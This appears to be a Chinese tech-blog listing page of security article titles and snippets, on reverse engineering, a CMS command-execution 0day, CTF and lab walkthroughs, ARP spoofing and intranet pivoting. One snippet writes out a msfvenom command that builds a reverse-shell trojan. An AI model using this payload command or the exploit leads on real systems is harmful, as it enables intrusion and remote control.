得物(毒)加密算法解析 得物逆向

写在前面:本文仅限交流学习使用,请勿使用在任何非法商业活动,禁止用于非法用途。否则后果自负。如有侵权,请告知删除,谢谢!抓包分析:本文以detailV3接口为例:POST https://app.dewu.com/api/v1/h5/index/fire/flow/product/detailV3{

7-Zip如何创建分卷压缩文件,进行分批压缩?

7-Zip如何创建分卷压缩文件,进行分批压缩?

eyoucms 1.5.5任意命令执行漏洞(0day)

eyoucms 1.5.5任意命令执行漏洞文章目录eyoucms 1.5.5任意命令执行漏洞一、漏洞简介二、漏洞影响三、复现过程漏洞位置漏洞分析漏洞利用一、漏洞简介eyoucms1.5.5后台存在任意命令执行漏洞。二、漏洞影响eyoucms1.5.5三、复现过程漏洞位置application\adm

macOS系统安装NMAP扫描工具

macOS系统安装NMAP扫描工具最近做Kali网络渗透测试实验,需要用到一些扫描工具。当然少不了大名鼎鼎的Nmap (“Network Mapper”) 工具。Nmap 是一款开源的网络扫描和安全审计工具。Nmap对单个集群可以非常有效的工作,但是同样能够快速扫描大型网络。Nmap利用原IP数据包

青少年CTF-Web-帝国CMS1-3通关记录

本次进通过平台内题目进行,非真实环境。首先下发题目链接我们首先先找后台看看后台地址为随后,经过dirsearch进行扫描,得到了一个www.zip访问扫描到的www.zip,得到网站源码使用D盾扫描,得到eval后门。蚁剑链接得到根目录的Flag这道题目和CMS01差不多,但是好像又有天差地别管理员

ICMP攻击实战及其简略防御方法

ICMP攻击实战及其简略防御方法

pikachu靶场-垂直/水平越权

地址:http://110.40.200.174:204/vul/overpermission/op1/op1_login.php。查看tips,分别登陆两个账号,发现admin账号有修改权限,另一个pikachu账号是普通账号,只有查看权限。修改url为其他人的name,如lucy-》lili。A

BLE协议--SMP(安全管理协议)

SMP即Security Manager Protocol。其内容主要是配对和Key的分发,然后用Key对链路或数据进行加密。双方要共同拥有一个加密key(LTK,Long Term Key)。这个key至关重要,怎么生成、怎么由通信的双方共享,关系到加密的成败。因此蓝牙协议定义了一系列的复杂机制,

sqlmap渗透实战进阶技巧

sqlmap实战渗透进阶技巧

信息安全导论习题及答案

信息安全导论习题

【云原生利器之Cilium】什么是Cilium

Cilium 是一个在 eBPF 之上设计的开源项目,旨在满足容器工作负载的网络、安全和可观测性要求。它在 eBPF 之上提供了一个高级抽象。Cilium 之于 eBPF,就像 Kubernetes 和容器运行时之于 Linux 内核namespace、cgroups 和 seccomp。.....

打穿内网之Vulntarget-a靶场实战记录

内容包括:通达OA未授权上传+文件包含RCE、Redis未授权写马、ms17-010永恒之蓝、代理转发内网跳板、CVE-2020-1472 域控杀器Zerologon、wmiexec/smbexec横向移动、cobalt strike与msf的shell传递

商用密码应用安全性评估----技术层面实现

商用密码安全性评估

Linux搭建YUM仓库

目录一、yum仓库简介1.1简介1.2yum的实现过程原理二、yum配置文件以及操作2.1 配置YUM本地仓库2.2安装httpd服务三、采用内网搭建yum仓库3.1http方式内网环境搭建yum仓库3.2 ftp方式搭建yum仓库四、总结一、yum仓库简介1.1简介基于RPM包构建的软件更新机制

Win7 您需要Trustedinstaller 提供的权限才能对此文件夹进行更改

Win7系统 您需要Trustedinstaller 提供的权限才能对此文件夹进行更改

msf生成木马

Linux  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elfWindow

什么叫做信息安全?包含哪些内容?与网络安全有什么区别?

生活中我们经常会听到要保障自己的或者企业的信息安全。那到底什么是信息安全呢?信息安全包含哪些内容?与网络安全又有什么区别呢?今天我们就一起来详细了解一下。

密码学的应用

密钥的产生密钥的分发密钥的更新密钥的存储和备份密钥的撤销和销毁1.密钥的产生手工方式:应考虑密钥空间、弱密钥问题,例如:姓名、生日、常用单词等,这样的密钥都是弱密钥。字典攻击可破解40%的密钥。解决方法:增加复杂性、随机机自动方式:更好的方式用自动处理设备产生的随机位串随机噪声伪随机位串2.密钥的分

python编写arp攻击与欺骗脚本

目录1.arp欺骗2.arp欺骗实验2.1 构造arp包2.2 发送数据包2.3 查看路由表3.完善arp欺骗过程4. 编写arp欺骗脚本1.arp欺骗arp欺骗是数据链路层的攻击,在数据链路层是通过mac地址来发送报文的,所以需要将网络层的ip对应到mac地址,由于arp协议是基于局域网内主机互相

解决谷歌浏览器你的时钟快了和证书问题

解决你的时钟快了和证书问题

登录可以使用的更多功能哦! 登录
作者榜
...
资讯小助手

资讯同步

...
内容小助手

文章同步

...
Deephub

公众号:deephub-imba

...
奕凯

公众号:奕凯的技术栈